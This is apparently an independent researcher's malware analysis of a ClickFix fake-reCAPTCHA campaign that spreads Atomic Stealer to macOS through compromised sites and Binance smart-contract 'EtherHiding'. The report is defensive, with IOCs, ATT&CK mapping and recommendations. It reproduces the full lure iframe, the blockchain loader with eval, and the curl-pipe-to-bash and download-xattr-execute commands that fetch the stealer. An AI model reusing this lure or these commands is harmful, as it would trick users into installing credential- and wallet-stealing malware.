Introduction: From One Clue to a Global Campaign

As an independent cybersecurity researcher, I’m driven by the thrill of chasing down threats that exploit trust in clever ways. I am particularly interested on chasing "ClearFix" or "ClickFix" campaigns as they seem to be particularly effective on delivering the malware and causing a big amount of financial impact on normal individuals and companies alike. On May 4, 2025, I came across into a suspicious web activity that led me to agencia2.jornalfloripa[.]com.br, a Brazilian news site (legitimate) used for hosting a sophisticated watering hole attack delivering what I believe to be Atomic Stealer (AMOS), a dangerous macOS infostealer. This discovery was just the starting point. By digging deeper, I uncovered approximately ~2,800 potentially compromised websites using the same malicious tactics (TTPs), pointing to a campaign of staggering scale. I will refer to this campaign as MacReaper.

This report details my investigation into this campaign, which uses a fake reCAPTCHA interface—known as ClickFix or ClearFix—alongside obfuscated JavaScript and Binance Smart Contracts in an EtherHiding scheme to deploy a Mach-O binary, confirmed as Atomic Stealer via VirusTotal (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c). Combining static analysis from Binary Ninja, dynamic insights from VirusTotal sandboxes, and critical research data from Censys and Onyphe—whom I thank for enabling such expansive investigations—I’ve mapped out the attack’s mechanics, from its social engineering stage to its blockchain-based command structure. This campaign, honed to target macOS users, is a wake-up call for defenders across the globe.

Executive Summary

The watering hole attack, first spotted on agencia2.jornalfloripa[.]com.br, targets macOS users with a ClickFix/ClearFix fake reCAPTCHA interface displayed only on macOS devices, identified through User-Agent sent to a third party domain. Clicking “I’m not a robot” triggers a Binance Smart Contract, using an EtherHiding technique, to deliver a Base64-encoded command to the clipboard, which users are prompted to run in Terminal via macOS-specific shortcuts (⌘ + Space, ⌘ + V). This command downloads a script that retrieves and executes a Mach-O binary, confirmed as Atomic Stealer. The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections. After uncovering the initial site, I pivoted to identify ~2,800 potentially compromised websites employing the same delivery method, indicating a big-scale campaign. My analysis, blending Binary Ninja’s static insights with Censys/Onyphe data, reveals a C++-based binary that dynamically constructs commands for execution. This report provides a comprehensive breakdown of the attack’s components, tactics, techniques, procedures (TTPs), IOCs, and recommendations for detection/mitigation as well as steps to disrupt adversary activity.

Threat Overview: Atomic Stealer (AMOS)

Atomic Stealer, also known as AMOS, is a macOS-specific infostealer that surfaced in April 2023. Sold as a Malware-as-a-Service (MaaS) on Telegram for $1,000–$3,000 monthly, AMOS is built to steal sensitive data, including:

  • Keychain Passwords: Extracts credentials stored in macOS Keychain, a goldmine for personal and corporate accounts.
  • Browser Data: Harvests cookies, passwords, and autofill data from browsers like Chrome and Firefox.
  • Cryptocurrency Wallets: Targets over 50 wallets and extensions, including Binance, Exodus, and Coinomi.
  • System Information: Collects hardware UUID, CPU, RAM, and OS details using system_profiler.
  • File Exfiltration: Downloads files from Desktop and Documents folders, often requesting user permission to blend in.

AMOS delivery thrives on social engineering, using tactics like ClickFix/ClearFix fake reCAPTCHAs to trick users into granting system access, often bypassing macOS Gatekeeper with binaries. Its distribution channels include fake websites, malvertising (e.g., Google Ads poisoning), and pirated software pushed on platforms like Reddit. The attack vector on agencia2.jornalfloripa[.]com.br, the first site I uncovered, employs these methods, kicking off a multi-stage infection chain that I traced to thousands of other potentially compromised sites.

Technical Analysis

Attack Delivery Mechanism

The investigation began with agencia2.jornalfloripa[.]com.br, a Brazilian news website compromised to serve as a watering hole (MITRE ATT&CK T1189). This initial find led to broader pivoting, revealing a campaign potentially spanning ~2,800 websites. The malicious infrastructure, embedded in the site’s HTML, includes:

  • Three Full-Screen Iframes: Iframes (saved_resource(6).html, (7).html, (8).html) with z-index: 2147483647 blanket the page, ensuring visibility. One hosts the ClickFix/ClearFix fake reCAPTCHA interface.
  • Obfuscated JavaScript: Two segments of encoded JavaScript, using Base64 and string arrays, set up the attack environment and likely trigger iframe injection.
  • Binance Smart Contract Script: A script leverages Binance Smart Contracts in an EtherHiding scheme to deliver specific information and commands, enhancing stealth and resilience (whilst also avoiding pivoting capabilities).
  • Cloudflare Challenge Iframe: A hidden iframe implements a Cloudflare challenge, likely to thwart automated analysis or bots.

The primary delivery mechanism is the ClickFix/ClearFix fake reCAPTCHA interface, which manipulates users into executing a malicious command.

ClickFix/ClearFix Fake reCAPTCHA Interface

The iframe, embedded as a full-screen overlay, mimics Google’s reCAPTCHA interface with striking accuracy:

<iframe srcdoc="<!DOCTYPE html>
<html lang='en'>
<head>
  <meta charset='utf-8'>
  <title>reCAPTCHA Verification</title>
  <link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.0.0/css/all.css'>
  <script src='https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js'></script>
  <style>
    html,body{height:100%;margin:0;background:#fff;display:flex;justify-content:center;align-items:center;}
    .C{font-family:Roboto,helvetica,arial,sans-serif}
    .Z{margin:0;padding:0}
    .B{display:block}
    code{font-size:.92rem;margin-left:.13rem;color:gray;}
    .L{line-height:normal}
    .A{height:4.86rem;width:19.69rem;background:#f9f9f9;border-radius:.2rem;border:.07rem solid #d3d3d3;}
    .A a{color:#555;text-decoration:none}
    .A a:hover{text-decoration:underline}
    .D{width:1.84rem;height:1.84rem}
    .E{position:relative;background:#fff;border-radius:.13rem;width:100%;height:100%;border:.13rem solid #c1c1c1;margin:1.38rem 0 0 .79rem;outline:none;transition:width .5s,height .5s,border-radius .5s,margin-top .5s,margin-left .5s,opacity .7s;}
    .E:hover{border:.13rem solid #b2b2b2}
    .F{position:relative;left:3.41rem;bottom:.2rem;font-size:.98rem;color:#282727;}
    .G{position:relative;left:15.58rem;bottom:2.36rem;height:2.95rem;vertical-align:baseline;padding-bottom:.26rem;}
    .H{position:relative;color:#555;font-size:.53rem;text-align:center;bottom:2.63rem;left:7.35rem;}
    .I{visibility:hidden;position:relative;top:-5.58rem;left:.79rem;width:1.31rem;height:1.31rem;border:.13rem solid rgba(0,0,0,.1);border-top:.13rem solid #333;border-radius:50%;opacity:0;transition:opacity .5s;animation:spin 1s linear infinite;}
    @keyframes spin{0%{transform:rotate(0)}100%{transform:rotate(360deg)}}
    .V{font-family:Roboto,helvetica,arial,sans-serif;opacity:0;position:absolute;visibility:hidden;margin:auto;background:#fff;border:.07rem solid #cecece;box-shadow:.33rem .39rem .46rem -.2rem rgba(0,0,0,.12);transition:opacity .4s;transform:scale(1.1);transform-origin:top left;}
    ol{counter-reset:item;list-style:none;padding:0;}
    ol li{counter-increment:item;margin-bottom:.66rem;}
    ol li:before{content:counter(item) ". ";color:#1A73E8;font-weight:700;margin:0 .66rem;}
    .W{padding:.53rem}
    .X{background:#1A73E8;padding:1.05rem 1.05rem 1.58rem 1.05rem;color:#fff;}
    .Xs{font-size:.92rem;line-height:normal}
    .Xm{font-size:1.05rem}
    .Xl{font-size:1.58rem;font-weight:700}
    .Y{padding:.33rem;color:#111;font-size:.85rem}
    .Zf{border-top:.07rem solid #cecece;padding:.66rem .46rem;color:#737373;display:grid;grid-template-columns:auto 6.69rem;font-size:.85rem;}
    .Zl{padding:.33rem}
    .U{background:#5a89e2;color:#fff;text-transform:uppercase;text-align:center;width:100%;padding:.79rem 0;border:none;outline:none;cursor:not-allowed;font-weight:600;font-size:.92rem;border-radius:.2rem;}
    .U.B{height:min-content}
    .fixed-width{width:30rem;word-wrap:break-word;overflow-wrap:break-word;}
  </style>
  <script>
    fetch('https://technavix.cloud/popup',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});
  </script>
</head>
<body>
  <div class='C Z B'>
    <div id='c' class='A Z B'>
      <div class='D Z'>
        <button id='b' class='E Z L'></button>
      </div>
      <p class='F Z L'>I'm not a robot</p>
      <img class='G' src='https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/ReCAPTCHA_icon.svg/220px-ReCAPTCHA_icon.svg.png'/>
      <p class='H Z L'>
        <a href='https://www.google.com/intl/en/policies/privacy/'>Privacy </a>
        <a href='https://www.google.com/intl/en/policies/terms/'> Terms</a>
      </p>
      <img id='s' class='I'/>
    </div>
    <div id='v' class='V'>
      <div class='W'>
        <header class='X'>
          <span class='Xm Z B'>Complete these</span>
          <span class='Xl Z B'>Verification Steps</span>
        </header>
        <main class='Y'>
          <p>To better prove you are not a robot, please:</p>
          <ol>
            <li>Press & hold the ⌘ <b>Command Key</b> + <b>Space</b> and input <b>'Terminal'</b>.</li>
            <li>In the <b>'Terminal'</b> window, press ⌘ <b>Command Key</b> + <b>V</b>.</li>
            <li>Press <b>Enter</b> on your keyboard to finish.</li>
          </ol>
          <p>You will observe and agree:<br>
            <div class='fixed-width'><code><span id='i'>0</span></code></div>
          </p>
        </main>
        <footer class='Zf W'>
          <div class='Zl'>Perform the steps above to finish verification.</div>
          <button id='bt' class='U B' disabled>Verify</button>
        </footer>
      </div>
    </div>
  </div>
  <script>
    const contractABI = [{'inputs': [], 'name': 'jadeCode', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'stateMutability': 'view', 'type': 'function'}];
    const contractAddress = '0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA';
    const web3 = new Web3('https://bsc-dataseed.binance.org/');
    const skylineContract = new web3.eth.Contract(contractABI, contractAddress);
    async function getPearlTower() {
      try {
        const result = await skylineContract.methods.jadeCode().call();
        return result;
      } catch (error) {
        console.error('Error fetching pearlTower:', error);
        throw error;
      }
    }
    let copyCommand;
    getPearlTower().then(result => copyCommand = result);
    const a = document.getElementById("c");
    const b = document.getElementById("b");
    const s = document.getElementById("s");
    const v = document.getElementById("v");
    addEventListener("click", e => {
      const path = e.composedPath();
      if (!path.includes(v) && v.style.display === "block") {
        v.style.display = "none";
        v.style.visibility = "hidden";
        v.style.opacity = 0;
        b.style.visibility = "visible";
        b.style.opacity = 1;
        b.disabled = false;
        s.style.visibility = "hidden";
        s.style.opacity = 0;
      }
    });
    b.addEventListener("click", e => {
      e.preventDefault();
      b.disabled = true;
      startLoading();
    });
    function startLoading() {
      b.style.visibility = "hidden";
      b.style.opacity = 0;
      setTimeout(() => {
        s.style.visibility = "visible";
        s.style.opacity = 1;
      }, 500);
      setTimeout(showVerification, 900);
    }
    function showVerification() {
      fetch('https://technavix.cloud/copy',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});
      v.style.display = "block";
      v.style.visibility = "visible";
      v.style.opacity = 1;
      v.style.top = a.offsetTop - 80 + "px";
      v.style.left = a.offsetLeft + 54 + "px";
      if (v.offsetTop < 5) v.style.top = "5px";
      if (v.offsetLeft + v.offsetWidth > innerWidth - 10)
        v.style.left = a.offsetLeft - 8 + "px";
      const r = Math.floor(Math.random() * 9000 + 100000);
      document.getElementById("i").textContent = copyCommand;
      copyToClipboard(copyCommand);
    }
    function copyToClipboard(text) {
      const x = document.createElement("textarea");
      x.value = text;
      document.body.append(x);
      x.select();
      document.execCommand("copy");
      x.remove();
    }
  </script>
</body>
</html>
" style="width: 100%; height: 100%; border: none; position: fixed; top: 0px; left: 0px; z-index: 1000;"></iframe>
  • Detailed Functionality:
  • Interface Design: The ClickFix/ClearFix iframe crafts a near-perfect replica of Google’s reCAPTCHA, using the Roboto font, Google’s reCAPTCHA logo (ReCAPTCHA_icon.svg), and privacy/terms links to Google’s policies for legitimacy (Classic MO). The .A class shapes the reCAPTCHA box (19.69rem wide, 4.86rem high) with a light gray background and a subtle border. The .E class styles the interactive checkbox button, with hover effects shifting the border to a darker gray for realism.
  • Network Activity: On load, the iframe sends a POST request to technavix[.]cloud/popup with the user’s navigator.userAgent in JSON format ({u: navigator.userAgent}), likely to log the device type or confirm a macOS environment.

    Please find a reference that I collected while performing dynamic analysis of the website delivery function:
  • User Interaction:
    • Clicking “I’m not a robot” (button#b) triggers startLoading(), which hides the button, shows a loading spinner (.I class, a rotating circle), and calls showVerification() after a 900ms delay to simulate processing.
    • showVerification() sends a second POST to technavix.cloud/copy to log the clipboard action, then displays a verification dialog (.V class) instructing users to open Terminal (⌘ + Space), paste the command (⌘ + V), and press Enter. The dialog is positioned relative to the reCAPTCHA box (v.style.top, v.style.left), with adjustments for smaller screens.
  • Clipboard Manipulation: The script queries the Binance Smart Contract for the jadeCode method, stores the result in copyCommand, and copies it to the clipboard using copyToClipboard(). This function creates a temporary <textarea>, sets its value to the command, selects the text, executes the copy command, and removes the element.
  • Visual Feedback: The verification dialog includes a code block (<code><span id='i'>0</span></code>) displaying the copied command, reinforcing user trust in the “verification” process.
  • Breakdown:
    • echo '...==': Outputs a Base64-encoded string.
    • sh: Executes the decoded command, using curl with flags:
      • -f: Fails silently on server errors.
      • -s: Suppresses progress output.
      • -S: Shows errors if -f fails.
      • -L: Follows redirects.
    • The command fetches verify.sh from https://salorttactical[.]top/2/verify.sh and runs it via bash.
  • Breakdown:
    • curl -o /tmp/update: Downloads the Atomic Stealer binary to /tmp/update from https://salorttactical[.]top/update.
    • xattr -c: Removes extended attributes, bypassing macOS Gatekeeper’s quarantine.
    • chmod +x: Grants execute permissions to the binary.
    • /tmp/update: Runs the binary, confirmed as Atomic Stealer (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c).

Second-Stage Command:
The verify.sh script executes:

curl -o /tmp/update https://salorttactical.top/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update

base64 -D: Decodes to:

/bin/bash -c "$(curl -fsSL https://salorttactical.top/2/verify.sh)"

Command Copied to Clipboard:
The jadeCode method returns:

echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==' | base64 -D | sh

EtherHiding with Binance Smart Contracts

The attack employs Binance Smart Contracts in an EtherHiding scheme, a technique where malicious commands are embedded in blockchain transactions to evade detection and resist takedowns. This approach enhances the attack’s stealth and operational resilience.

Primary Contract

  • Address: 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
  • Method: jadeCode
  • Execution Flow:
  • Purpose:
    • Delivers the initial malicious command, encoded in Base64 to obscure its intent from static analysis tools.
    • Leverages EtherHiding by embedding the command in a blockchain transaction, making it resistant to traditional server takedowns.
    • Enables attackers to update the command (e.g., change URLs) by modifying the contract’s state, without altering the compromised website’s code.
  1. The iframe script initializes Web3.js to connect to the Binance Smart Chain (BSC) node at https://bsc-dataseed.binance.org/, a public endpoint for blockchain interactions. This is a similar MO/TTP as highlighted by Guard.io.
  2. It defines the contract ABI, specifying the jadeCode method, which returns a string output.
  3. The result is stored in copyCommand and copied to the clipboard via copyToClipboard(), ensuring seamless delivery to the user.

    One of the multiple calls:

The getPearlTower function asynchronously calls jadeCode, retrieving:

L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==


Which translates to:

/bin/bash -c "$(curl -fsSL https://salorttactical[.]top/2/verify.sh)"


Script:

const contractABI = [{'inputs': [], 'name': 'jadeCode', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'stateMutability': 'view', 'type': 'function'}];
const contractAddress = '0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA';
const web3 = new Web3('https://bsc-dataseed.binance.org/');
const skylineContract = new web3.eth.Contract(contractABI, contractAddress);
async function getPearlTower() {
  try {
    const result = await skylineContract.methods.jadeCode().call();
    return result;
  } catch (error) {
    console.error('Error fetching pearlTower:', error);
    throw error;
  }
}
let copyCommand;
getPearlTower().then(result => copyCommand = result);

Secondary Contract

  • Address: 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
  • Execution Flow:
    1. On page load (DOMContentLoaded), the script logs a message and connects to the BSC node using Web3.js.
    2. Queries the contract for orchidABI (a compressed ABI string) and orchidAddress, which defines another contract’s location.
    3. Decompresses orchidABI using pako.ungzip, parsing it into a JSON ABI to instantiate a new contract at orchidAddress.
    4. Calls tokyoSkytree to retrieve decompressedScript, a Base64-encoded, gzipped JavaScript payload.

Part of the multiple calls to Binance also showed this:

H4sIAAXqE2gC/xXMQQ6CMBAAwOcsJJXe68l48yAm8IHaLrQGd5t2ITaEv6vzgJlQXGggiKRitBZ0gewWP51bePUa1P5GCewNPPphBBXQeszF7HBlEiQ5jTUhGLApLdFZiUz6VZjgUE/21dyG/t4VyZHmONVmX83/n61w7taC+TL/kqM92vMX6yc7YosAAAA=

Which translates to:

fetch('https://technavix[.]cloud/',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});

Note navigator.userAgent.

  • Purpose:
  • Why EtherHiding?:
    • Stealth: Commands and scripts stored on the blockchain blend with legitimate Web3 traffic, evading traditional network monitoring.
    • Resilience: The decentralized BSC ensures commands remain accessible, even if traditional C2 servers are taken down.
    • Flexibility: Attackers can update contract data (e.g., new scripts or commands) without touching compromised websites, maintaining operational agility.
    • Obfuscation: Base64 encoding, gzip compression, and eval layers conceal the attack logic, complicating analysis by defenders.
  • Likely injects the ClickFix/ClearFix iframe, performs setup tasks (e.g., DOM manipulation), or conducts additional checks to ensure the attack targets macOS devices or Windows by instructing the call to technavix[.]cloud.
  • The eval execution allows dynamic updates to the attack logic, enabling attackers to adapt without modifying the website’s static code.
  • Uses EtherHiding to embed the script in a blockchain transaction, further obscuring the attack’s infrastructure.

    Ref:

Script:

console.log('Start moving...');
document.addEventListener('DOMContentLoaded', async () => {
  try {
    const web3 = new Web3('https://bsc-dataseed.binance.org/');
    const contract = new web3.eth.Contract([
      {"inputs": [], "stateMutability": "nonpayable", "type": "constructor"},
      {"inputs": [], "name": "orchidABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"},
      {"inputs": [], "name": "orchidAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"},
      {"inputs": [], "name": "merlionABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"},
      {"inputs": [], "name": "merlionAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"},
    ], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53');
    const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c => c.charCodeAt(0)), { to: 'string' }));
    const orchidAddress = await contract.methods.orchidAddress().call();
    const orchid = new web3.eth.Contract(orchidABI, orchidAddress);
    const decompressedScript = pako.ungzip(Uint8Array.from(atob(await contract.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), { to: 'string' });
    eval(`(async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);`);
  } catch (error) {
    console.error('Road unavaible:', error);
  }
});

macOS-Specific Targeting

The attack is meticulously designed to target macOS users, using a combination of client-side and server-side mechanisms to ensure the ClickFix/ClearFix interface is displayed only on macOS devices.

Client-Side Targeting

  • Mechanism: The obfuscated JavaScript in the website’s HTML, particularly the first segment, likely performs a User-Agent check to identify macOS devices before injecting the ClickFix/ClearFix iframe. This check is not explicitly visible in the provided HTML or iframe code, indicating it resides within the Base64-decoded eval(E) payload or the decompressedScript from the secondary Binance contract.
  • Evidence:
    • The ClickFix/ClearFix interface’s verification dialog uses macOS-specific shortcuts (⌘ + Space to open Spotlight, ⌘ + V to paste), clearly tailored for macOS users.
    • Testing confirms the same iframe does not appear on non-macOS devices (e.g., Windows, Linux), suggesting a client-side filter.
      Edit: After a few days the actor has also started also targeting Windows devices by showing a different iframe.
  • Implementation Details:
    • This obfuscation likely constructs the iframe dynamically, appending it to the DOM (document.body.appendChild) only for macOS User-Agents.
    • The eval(E) payload, derived from a Base64-decoded string (E = atob(Nn(...)...)), may contain logic to parse navigator.userAgent and trigger iframe injection.
    • The secondary contract’s decompressedScript, executed via eval, could include additional client-side checks, further hiding the targeting logic.

The first JavaScript segment defines a string array (Np) with terms like create, iframe, append, and document, encoded via functions such as i, Nn, and Nh:

const Np = ['dXRzI','table','aXAoV','ZyIsI','gwKSk','cifV0','n()\x20','uY2hh','eukue','mlldy',...];
JcXsUw="ZnVuY3Rpb24gTnkoTixiLEIsUSxTKXtyZXR1cm4gaShiLTB4MWY3LEIpO31...";

Server-Side Validation

  • Function:
    • The server likely validates the User-Agent, responding only to macOS devices (e.g., those with “Macintosh” in the string).
    • The /popup request may confirm the device type before rendering the iframe, while /copy logs the clipboard action, potentially tracking successful infections.
  • Evidence:
    • The exclusive use of macOS-specific shortcuts in the verification dialog suggests server-side filtering to deliver commands only to macOS users.
    • The dual POST requests indicate a server-side workflow that correlates User-Agent data with attack progression.

Mechanism: The ClickFix/ClearFix iframe sends POST requests to technavix[.]cloud (/popup on load, /copy during verification) with the user’s navigator.userAgent:

fetch('https://technavix[.]cloud/popup', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({u: navigator.userAgent})
});

Targeting Precision

  • The reliance on macOS shortcuts (⌘ + Space, ⌘ + V) is a deliberate choice, aligning with AMOS’s focus on macOS environments. The same behaviour has been observed in more than 600 hosts that I manually verified from the list provided at the end of this article.
  • The absence of Windows or Linux-specific instructions (e.g., Ctrl + V, Start menu) confirms the attack’s exclusivity.
    Edit: After a few days the actor also started to target Windows devices, showing dinamically Windows or MacOS instructions.
  • The combination of obfuscated JavaScript and server-side validation minimizes exposure to non-target devices, reducing detection risks.
clickfix

Atomic Stealer Binary Execution

The Mach-O binary, downloaded as /tmp/update, is a C++-based infostealer confirmed as Atomic Stealer through VirusTotal analysis (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c). Binary Ninja analysis offers detailed insights into its structure and behavior.

Binary Structure

  • Type: Mach-O, x86_64 architecture, tailored for macOS systems.
  • Libraries:
    • libc++.1.dylib: Provides C++ standard library functions for string manipulation and memory operations.
    • libSystem.B.dylib: Enables macOS system calls, including _system for command execution.
  • Key Sections:
    • __text (0x100000680-0x100002f1a, 0x289a bytes): Contains executable code, including the main function sub_100000680.
    • __cstring (0x100003288-0x100003290, 8 bytes): A small string section, likely holding a short command or identifier.
    • __const (0x100003290-0x1000ab528, 0xa8298 bytes): A large read-only data section, possibly containing encrypted payloads or configuration data.
  • Code Signature: Includes a valid signature (0x5f20 bytes), enabling the binary to bypass macOS Gatekeeper.
  • UUID: e8633716-8673-317e-bcd4-2616e5956cef

Key Function: sub_100000680

  • Purpose: Acts as the main function, constructing a string (likely a shell command) through bit manipulation and table lookups, executed via _system.
  • Execution Flow:
    1. Table Initialization: Calls sub_100000860 (invoking sub_100001a10, not provided) to set up a lookup table (var_38) with a size of 0x100 and a flag (var_3c set to 0xffffffff).
    2. Table Construction: Iterates over a range determined by sub_100000890 (invoking sub_100002820, not provided), mapping indices to values in var_38 using sub_100000930 and sub_1000008e0.
    3. String Construction:
      • Processes input data (arg2) via sub_1000009b0 and sub_100000a00, extracting bytes with sub_100000a90.
      • Maps each byte to an index (rax_17) in var_38 using sub_1000008e0.
      • Accumulates bits (var_50 << 6 | rax_17) and builds a std::string (arg1) by appending bytes (std::string::push_back) when enough bits are collected (i_1 >= 8).
      • Advances the input pointer with sub_100000ab0 until the loop condition (sub_100000a50) is met.
    4. Cleanup and Return: Calls sub_100000ad0 to free the table and returns the constructed string (arg1).
  • Purpose:
    • Constructs a command or payload, likely sourced from the __const section or runtime data, for execution via _system, a macOS system call from libSystem.B.dylib.
    • The command may initiate data theft, establish C2 communication, or fetch additional payloads.
  • Malicious Capabilities (Also as advertised on Telegram):
    • Keychain Access: Prompts users for passwords to unlock Keychain, extracting stored credentials.
    • Browser Data: Harvests cookies, passwords, and autofill data from Chrome, Firefox, and other browsers.
    • Cryptocurrency Wallets: Targets Binance, Exodus, and over 50 wallet extensions.
    • System Reconnaissance: Collects hardware and OS details using system_profiler.
    • File Exfiltration: Downloads files from Desktop and Documents, requesting user permission to appear legitimate.

High-Level Intermediate Language (HLIL):

void* sub_100000680(void* arg1, int64_t arg2, int64_t arg3)
{
  void* var_10 = arg1;
  int32_t var_3c = 0xffffffff;
  void var_38;
  sub_100000860(&var_38, 0x100, &var_3c); // Initializes lookup table
  for (int64_t i = 0; i < sub_100000890(arg3); i += 1)
    *sub_1000008e0(&var_38, zx.q(*sub_100000930(arg3, i))) = i.d; // Builds table
  char var_49 = 0;
  sub_100000990(arg1); // Initializes std::string
  int32_t var_50 = 0;
  int32_t i_1 = 0;
  int64_t var_68 = sub_1000009b0(arg2);
  int64_t var_70 = sub_100000a00(arg2);
  while (((sub_100000a50(&var_68, &var_70) ^ 0xff) & 1) != 0)
  {
    char* rax_14;
    rax_14.b = *sub_100000a90(&var_68); // Extracts input byte
    int32_t rax_17 = *sub_1000008e0(&var_38, zx.q(rax_14.b)); // Maps byte to index
    if (rax_17 >= 0)
    {
      var_50 = var_50 << 6 | rax_17; // Accumulates bits
      i_1 += 6;
      while (i_1 >= 8)
      {
        i_1 -= 8;
        char var_79_1 = (var_50 >> i_1.b).b;
        std::string::push_back(arg1.b); // Appends byte to command string
      }
    }
    sub_100000ab0(&var_68); // Advances input pointer
  }
  char var_49_1 = 1;
  sub_100000ad0(&var_38); // Cleans up table
  return arg1;
}

Campaign Scale: A Network of 2,800 Potentially Compromised Sites

The investigation kicked off with agencia2.jornalfloripa[.]com.br, but pivoting from this lead revealed a far broader campaign. With access to research data from Censys and Onyphe, I identified approximately 2,800 websites, spanning diverse domains from news outlets to personal blogs. This partially confirmed list, points to a coordinated operation likely exploiting vulnerabilities in website hosting or content management systems (I am tempted to believe they are all Wordpress), leveraging AMOS’s MaaS model for scale.

The scale seems to be so big, that even viewing the obserables is a difficult task:

Tactics, Techniques, and Procedures (TTPs)

Mapped to MITRE ATT&CK:

  • Initial Access:
    • T1189: Watering Hole (compromised websites).
    • T1566.004: Phishing (ClickFix/ClearFix fake reCAPTCHA).
  • Execution:
    • T1204.002: User Execution (Terminal command).
    • T1059.004: Command and Scripting Interpreter (bash).
  • Privilege Escalation:
    • T1548.003: Abuse Elevation Control Mechanism (fake password prompts).
  • Credential Access:
    • T1555.003: Credentials from Password Stores (Keychain).
  • Collection:
    • T1005: Data from Local System (browser data, wallets).
  • Command and Control:
    • T1572: Protocol Tunneling (EtherHiding via Binance Smart Contracts).
    • T1071.001: Application Layer Protocol (HTTP POST to technavix.cloud).
  • Exfiltration:
    • T1041: Exfiltration Over C2 Channel (base64-encoded ZIPs).

Recommendations for macOS Users and Defenders

  1. Detection:
    • Monitor network traffic for POST requests to technavix[.]cloud or salorttactical[.]top.
    • Use endpoint detection and response (EDR) tools to spot Keychain access, system_profiler execution, or osascript activity.
    • Check web server logs for signs of ClickFix/ClearFix or EtherHiding activity.
  2. Prevention:
    • Block IOCs (domains, IPs, contract addresses) using firewalls or DNS filtering.
    • Educate users to avoid running Terminal commands from untrusted websites, especially those prompted by reCAPTCHA-like interfaces.
    • Implement strict Content Security Policy (CSP) to block eval or unauthorized scripts.
  3. Response:
    • Quarantine infected systems and scan with macOS-specific antivirus tools (e.g., Malwarebytes).
    • Analyze /tmp/update in a macOS sandbox to confirm AMOS behavior and extract further IOCs.
    • Reset Keychain passwords, browser credentials, and cryptocurrency wallet access on affected devices.
  4. Threat Hunting:
    • Use Censys and Onyphe to identify additional compromised sites with similar ClickFix/ClearFix or EtherHiding tactics.
    • Monitor Binance Smart Contract activity (e.g., jadeCode, tokyoSkytree) for new campaign variants or updated commands.

Diamond Model of Intrusion Analysis

  • Adversary:
    • Description: Likely a cybercrime group operating Atomic Stealer (AMOS) as a Malware-as-a-Service (MaaS), sold on Telegram for $1,000–$3,000 monthly. The use of EtherHiding and ClickFix/ClearFix suggests a skilled actor with expertise in blockchain and macOS exploitation. The stealer is sold (as seen by other TI reports, by Telegram user ping3r, which claims to be a guarantor but not developer.
    • Attributes: Operates as a distributed team, leveraging MaaS for scalability. The campaign’s scope (~2,800 sites) indicates significant resources, possibly involving affiliates.
    • Edges:
      • Adversary-to-Infrastructure: Controls domains (technavix[.]cloud, salorttactical[.]top) and Binance Smart Contracts (0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53) for command delivery and payload hosting.
      • Adversary-to-Capability: Deploys ClickFix/ClearFix social engineering, EtherHiding, and a Mach-O binary, reflecting somewhat technical proficiency.
      • Adversary-to-Victim: Targets macOS users for financial gain (e.g., wallet theft) or data resale, exploiting trust in reCAPTCHA interfaces.
  • Infrastructure:
    • Description: A robust network of ~2,800 compromised websites (e.g., agencia2.jornalfloripa[.]com.br), C2 servers (technavix[.]cloud), payload hosts (salorttactical[.]top), and Binance Smart Contracts for EtherHiding.
    • Attributes: Employs three full-screen iframes (z-index: 2147483647) for ClickFix/ClearFix delivery, Cloudflare challenges to evade bots, and blockchain-based command delivery for resilience.
    • Edges:
      • Infrastructure-to-Capability: Hosts obfuscated JavaScript, ClickFix/ClearFix iframes, and the AMOS binary, enabling command execution and data theft.
      • Infrastructure-to-Victim: Delivers payloads to macOS devices via compromised websites, with POST requests to technavix[.]cloud for tracking.
      • Infrastructure-to-Adversary: Provides a decentralized C2 framework, with Binance Smart Contracts resisting takedowns.
  • Capability:
    • Description: Encompasses social engineering (ClickFix/ClearFix), EtherHiding via Binance Smart Contracts, obfuscated JavaScript, and a C++-based Mach-O binary with dynamic command construction.
    • Attributes: Uses Base64 encoding, eval, and pako.ungzip for obfuscation, and _system calls for command execution. The sub_100000680 function constructs commands via bit manipulation.
    • Edges:
      • Capability-to-Victim: Exploits user trust with ClickFix/ClearFix, prompting Terminal command execution (⌘ + Space, ⌘ + V), and steals Keychain, browser, and wallet data.
      • Capability-to-Infrastructure: Relies on compromised websites and blockchain contracts for payload delivery and execution.
